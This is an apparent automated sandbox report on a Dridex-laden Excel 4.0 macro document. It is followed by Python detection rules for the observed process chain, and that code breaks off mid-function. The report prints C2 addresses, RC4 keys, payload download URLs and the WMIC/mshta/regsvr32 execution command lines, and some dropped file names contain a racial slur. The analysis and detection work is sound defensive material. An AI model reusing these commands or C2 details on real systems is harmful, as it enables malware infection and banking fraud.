Windows Analysis Report Results12232021.xls

Overview

General Information

Sample Name: Results12232021.xls
Analysis ID: 544578
MD5: 8d1d1df2277e8730eee7de7fe28f60e1
SHA1: 773b3ff48428bdacf2afeb7fc9fd1261a2e0591c
SHA256: 4d21115441459063cf8403f94d3bb37201666be30622cb2cb4e2ffb32827192f
Tags: xls

Detection

Hidden Macro 4.0 Dridex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Found malicious Excel 4.0 Macro
Document contains OLE streams with names of living off the land binaries
Tries to delay execution (extensive OutputDebugStringW loop)
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Regsvr32 Command Line Without DLL
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Yara detected hidden Macro 4.0 in Excel
Contains functionality to create processes via WMI
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious WMI Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Entry point lies outside standard sections
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 11.2.regsvr32.exe.72a60000.8.unpack Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}
Multi AV Scanner detection for submitted file
Source: Results12232021.xls ReversingLabs: Detection: 20%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: wntdll.pdb source: regsvr32.exe, 0000000B.00000003.593737070.000000007DE80000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593142361.0000000002700000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593332634.0000000002850000.00000004.00000001.sdmp
Source: Binary string: RFFGTEQ.pdb source: mshta.exe, 00000005.00000003.581516518.0000000006934000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121978268.0000000005D10000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.581607342.00000000069BE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1122012753.0000000006000000.00000004.00000001.sdmp, fvfnigger.bin.5.dr, WIvRRHIemuhammadismyfriend[1].bin.5.dr

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cdn.discordapp.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 144.91.122.102:443
Source: Malware configuration extractor IPs: 85.10.248.28:593
Source: Malware configuration extractor IPs: 185.4.135.27:5228
Source: Malware configuration extractor IPs: 80.211.3.13:8116
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TOPHOSTGR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.4.135.27
Source: Joe Sandbox View IP Address: 162.159.135.233
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com.1 equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000003.00000002.576396153.0000000001BC0000.00000002.00020000.sdmp, WMIC.exe, 00000008.00000002.585430316.0000000001C00000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117795562.0000000001C60000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1117736563.0000000000800000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 0000000B.00000002.1118809244.0000000072A7F000.00000002.00020000.sdmp String found in binary or memory: http://www.baxleystamps.comDVarFileInfo$
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: mshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509168294461500/rebXcmuhammadismyfriend
Source: mshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509241996795935/iivKjRymuhammadismyfrie
Source: mshta.exe, 00000005.00000002.1121286244.0000000004EF5000.00000004.00000040.sdmp, mshta.exe, 00000005.00000003.582502016.00000000002FD000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfri
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].bin
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Dridex unpacked file
Source: Yara match File source: 11.2.regsvr32.exe.72a60000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1118714638.0000000072A61000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: enable content button above 4 5 6 7 8 m :0 = 11 12 lj 13 14 , d omn 15 16 17 18 wm
Found malicious Excel 4.0 Macro
Source: Results12232021.xls Macro extractor: Sheet: Macro1 contains: ShellExecuteA
Document contains OLE streams with names of living off the land binaries
Source: Results12232021.xls Stream path 'Workbook'
Source: Results12232021.xls.0.dr Stream path 'Workbook'
Found abnormal large hidden Excel 4.0 Macro sheet
Source: Results12232021.xls Macro extractor: Sheet name: Macro1 size: 5221
Found Excel 4.0 Macro with suspicious formulas
Source: Results12232021.xls Initial sample: EXEC
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000003.00000002.576163070.0000000000330000.00000004.00000020.sdmp Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf"C:\Windows\System32\wbem\WMIC.exeWinSta0\Default
Yara signature match
Source: Results12232021.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\Results12232021.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A70730
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A79370
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A61494
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A6A4E8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A68428
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A7143C
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A72234 NtDelayExecution
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A72820 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A73294 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A6BB44 NtClose
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 649C.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: Results12232021.xls Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Document contains embedded VBA macros
Source: Results12232021.xls OLE indicator, VBA macros: true
Source: Results12232021.xls.0.dr OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
Source: unknown Process created: C:\Windows\System32\mshta.exe mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD779.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@9/7@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: Results12232021.xls OLE indicator, Workbook stream: true
Source: Results12232021.xls.0.dr OLE indicator, Workbook stream: true
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Results12232021.xls Initial sample: OLE summary codepage = 1200
Source: Results12232021.xls Initial sample: OLE document summary codepagedoc = 1200
Source: Results12232021.xls.0.dr Initial sample: OLE summary codepage = 1200
Source: Results12232021.xls.0.dr Initial sample: OLE document summary codepagedoc = 1200
Source: 649C.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A6F6A8 push esi; mov dword ptr [esp], 00000000h 11_2_72A6F6A9
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .rdata

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\fvfnigger.bin
Drops PE files
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].bin
Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\fvfnigger.bin

Hooking and other Techniques for Hiding and Protection:

Creates and opens a decoy document (probably shown to the victim to hide the exploitation)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: cmd line: nxebchwsihyfkihhssltp.rtf Jump to behavior
Source: unknown Process created: cmd line: nxebchwsihyfkihhssltp.rtf
Stores large binary data to the registry
Source: C:\Windows\System32\mshta.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\mshta.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (30 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (3 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (3 identical entries)

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: OutputDebugStringW count: 1127
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2232 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1124 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2568 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2792 Thread sleep count: 1127 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\mshta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].bin Jump to dropped file
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1127 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A70730 GetSystemInfo, 11_2_72A70730

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A66D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 11_2_72A66D0C

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Results12232021.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\Results12232021.xls, type: DROPPED
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin Jump to behavior
Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmp Binary or memory string: Program Manager<
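The two "Process created" lines above give the execution chain: mshta.exe asks WMIC to run regsvr32.exe -s C:\\ProgramData\fvfnigger.bin, and the System32 regsvr32.exe then starts its SysWOW64 copy with the same arguments, consistent with a 32-bit payload DLL. Because Win32_Process.Create starts the child under the WMI provider host rather than under the caller, a detection that only walks parent PIDs never connects EXCEL/mshta/WMIC to the regsvr32.exe they launched. The code below is an added example, not from this report or from any vendor product: it implements the three Sigma detections listed for this sample (Office product spawning a shell, regsvr32 command line without a DLL, suspicious WMI execution) over constructed process-creation events modelled on the chain above, and joins the WMI-spawned child back to its WMIC caller by command line. The pids, WmiPrvSE.exe as the parent of the WMI-spawned regsvr32.exe, and the empty mshta argument (the report does not show it) are assumptions.

```python
"""Detection logic for the process chain in this report, run over constructed events.
Added example, not from the report or any vendor tool. Events mimic process-creation
log fields (pid, ppid, image, cmdline). WmiPrvSE.exe as parent of the WMI-spawned
regsvr32.exe, and the pids, are assumptions; the command lines follow the report."""
import ntpath

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "regsvr32.exe", "rundll32.exe", "wmic.exe", "certutil.exe", "msiexec.exe"}


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def split_args(cmdline: str) -> list:
    """Minimal Windows tokeniser: whitespace separates, double quotes group and are dropped."""
    args, cur, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append(cur)
                cur = ""
        else:
            cur += ch
    return args + ([cur] if cur else [])


def rule_office_spawns_lolbin(ev: dict, parent: dict) -> bool:
    """'Microsoft Office Product Spawning Windows Shell': Office parent, LOLBin child."""
    return (parent is not None and basename(parent["image"]) in OFFICE
            and basename(ev["image"]) in LOLBINS)


def rule_regsvr32_without_dll(ev: dict, parent: dict = None) -> bool:
    """'Regsvr32 Command Line Without DLL': the file being registered is not a .dll."""
    if basename(ev["image"]) != "regsvr32.exe":
        return False
    targets = [a for a in split_args(ev["cmdline"])
               if not a.startswith(("-", "/")) and basename(a) != "regsvr32.exe"]
    return bool(targets) and not any(t.lower().endswith(".dll") for t in targets)


def rule_wmic_process_create(ev: dict, parent: dict = None) -> bool:
    """'Suspicious WMI Execution': wmic.exe calling Win32_Process.Create."""
    if basename(ev["image"]) != "wmic.exe":
        return False
    toks = [a.lower() for a in split_args(ev["cmdline"])]
    return all(w in toks for w in ("process", "call", "create"))


RULES = (("office_spawns_lolbin", rule_office_spawns_lolbin),
         ("regsvr32_without_dll", rule_regsvr32_without_dll),
         ("wmic_process_create", rule_wmic_process_create))


def evaluate(events: list) -> list:
    """Return (rule, pid) alerts in event order, mirroring the Sigma hits in this report."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        alerts += [(name, ev["pid"]) for name, rule in RULES if rule(ev, parent)]
    return alerts


def ancestry(events: list, pid: int) -> list:
    """Image names from the oldest known ancestor down to pid, following ppid links."""
    by_pid, chain = {e["pid"]: e for e in events}, []
    while pid in by_pid and len(chain) < 64:          # depth cap guards against ppid cycles
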